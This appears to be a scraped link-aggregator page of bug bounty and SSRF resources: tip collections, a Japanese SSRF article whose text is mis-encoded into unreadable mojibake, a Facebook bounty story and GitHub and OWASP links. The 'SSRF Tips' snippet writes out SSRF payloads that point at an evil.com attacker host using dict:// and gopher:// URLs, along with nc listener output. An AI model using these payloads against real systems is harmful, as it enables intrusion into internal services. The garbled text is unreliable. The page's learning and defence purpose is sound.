Introduction | Book of BugBounty Tips
Hi , This book is a collection of "BugBounty" Tips tweeted / shared by community people. It includes the tweets I collected over the past from Twitter , Google and Hastags and chances that few tips may be missing. I have categorized tips against each vulnerability classification and "will be updating" regularly. Each tweet has link to original tweet to read about others replies / comments. Huge "T
サーãƒã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ã®å°Žå…¥ã‹ã‚‰ç”Ÿã˜ã‚‹SSRF | ã‚»ã‚ュリティブãƒã‚° | 脆弱性診æ–(セã‚ュリティ診æ–)ã®GMOサイãƒãƒ¼ã‚»ã‚ュリティ byイエラエ
オフェンシブセã‚ュリティ部ã®å±±å´Žã§ã™ã€‚サーãƒã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ï¼ˆSSR)ã®å°Žå…¥ã«ã‚ˆã£ã¦SSRFãŒç™ºç”Ÿã™ã‚‹å•é¡Œã‚’見ã¤ã‘る機会ãŒã‚ã£ãŸãŸã‚ã€æœ¬è¨˜äº‹ã§ã¯å®Ÿä¾‹ã‚’交ãˆãªãŒã‚‰ç´¹ä»‹ã—ãŸã„ã¨æ€ã„ã¾ã™ã€‚ サーãƒã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ï¼ˆSSR)ã¨ã¯ï¼Ÿ 本記事ã§æ‰±ã†SSRã¨ã¯ã€Œã‚µãƒ¼ãƒä¸Šã§HTMLを出力ã™ã‚‹ã“ã¨ã€ã‚’指ã—ã¦ã„ã¾ã™ã€‚ãŸã ã—erbã‚„jspã®ã‚ˆã†ãªãƒ†ãƒ³ãƒ—レートã‹ã‚‰HTMLを出力ã™ã‚‹ã®ã¨ã¯ç•°ãªã‚Šã€ä¸€èˆ¬çš„ã«ã¯ä»¥ä¸‹ã®ã‚ˆã†ã«ã‚¯ãƒ©ã‚¤ã‚¢ãƒ³ãƒˆã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ï¼ˆCSR)ã®æ–‡è„ˆã§ä½¿ã‚れるã“ã¨ãŒä¸»ã§ã™ã€‚ è¿‘å¹´ã®Vue.jsã‚„Reactを代表ã™ã‚‹ã‚ˆã†ãªWebフãƒãƒ³ãƒˆã‚¨ãƒ³ãƒ‰ãƒ•ãƒ¬ãƒ¼ãƒ ワークã¯ãƒ–ラウザ上ã§å‹•çš„ã«DOMツリーを構築ã—ã¦ç”»é¢ã‚’æ画(CSR)ã™ã‚‹ã®ãŒä¸»æµã¨ãªã£ã¦ã„ã¾ã™ã€‚ã“ã‚Œã«ã‚ˆã£ã¦ãƒšãƒ¼ã‚¸é·ç§»ã‚’挟ã¾ãšãƒ¦ãƒ¼ã‚¶ä½“験ã®ã‚ˆã„シングルページアプリケーション(SPA)ãŒä½œã‚‹ã“ã¨ãŒã§ãã‚‹ã¨ã„ã†ãƒ¡ãƒªãƒƒãƒˆãŒã‚ã‚Šã¾ã™ã€‚ ãŸã ã€å˜ç´”ãªSPAã«ã¯ãƒ‡ãƒ¡
SSRF Tips
http://safebuff.com/ssrf.php?dict://attacker:11111/ evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 // http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php <?php header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest'); ?> evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Conne
How I made $31500 by submitting a bug to Facebook
Hello World â¤ï¸, Facebook is the largest social networking site in the world and one of the most widely used. I have always been interested in testing the security of Facebook. During the sub domain enumeration, I’ve got a sub domain which is “https://m-nexus.thefacebook.com/". It redirects me to “https://m-nexus.thefacebook.com/servlet/mstrWebAdmin" observe below screenshot: I quickly Google keywo
1
リリースã€éšœå®³æƒ…å ±ãªã©ã®ã‚µãƒ¼ãƒ“スã®ãŠçŸ¥ã‚‰ã›
最新ã®äººæ°—エントリーã®é…ä¿¡
j次ã®ãƒ–ックマーク
kå‰ã®ãƒ–ックマーク
lã‚ã¨ã§èªã‚€
eコメント一覧を開ã
oページを開ã
GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties
XXXX
GitHub - ksharinarayanan/SSRFire: An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
CheatSheetSeries/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.md at master · OWASP/CheatSheetSeries
Penetration Testing | Hacking
GitHub - welefen/ssrf-agent: make http(s) request to prevent SSRF
{{#tags}}- {{label}}
{{/tags}}